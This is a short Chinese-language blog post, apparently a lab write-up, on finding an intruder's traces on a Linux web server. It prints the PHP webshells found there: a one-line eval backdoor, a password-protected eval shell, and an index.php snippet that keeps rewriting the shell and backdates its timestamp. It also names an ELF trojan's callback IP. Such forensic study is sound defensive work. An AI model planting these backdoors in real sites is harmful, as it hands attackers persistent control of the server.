N1Rvana's Blog
N1Rvana's Blog

第一章-应急响应-Linux入侵排查

 N1Rvana included in 应急响应
 About 100 words One minute  - views  

1.web目录存在木马,请找到木马的密码提交
2.服务器疑似存在不死马,请找到不死马的密码提交
3.不死马是通过哪个文件生成的,请提交文件名
4.黑客留下了木马文件,请找出黑客的服务器ip提交
5.黑客留下了木马文件,请找出黑客服务器开启的监端口提交
/var/www/html目录下面,发现可疑文件1.php .shell.php

1
2
3
4
5

#1.php  
<?php eval($_POST[1]);?>  
  
#.shell.php  
<?php if(md5($_POST["pass"])=="5d41402abc4b2a76b9719d911017c592"){@eval($_POST[cmd]);}?>

解密之后,得hello
index.php发现不死马

1
2
3
4
5

$file = '/var/www/html/.shell.php';  
$code = '<?php if(md5($_POST["pass"])=="5d41402abc4b2a76b9719d911017c592"){@eval($_POST[cmd]);}?>';  
file_put_contents($file, $code);  
system('touch -m -d "2021-01-01 00:00:01" .shell.php');  
usleep(3000);

存在shell(1).elf文件,判断为木马文件,放入到微步进行分析,得到ip 10.11.55.21
执行shell(1).elf,查看去连接了远程ip的哪个端口
netstat -antlp| grep 10.11.55.21

Updated on 2024-03-15 
Linux入侵排查
Back | Home
0%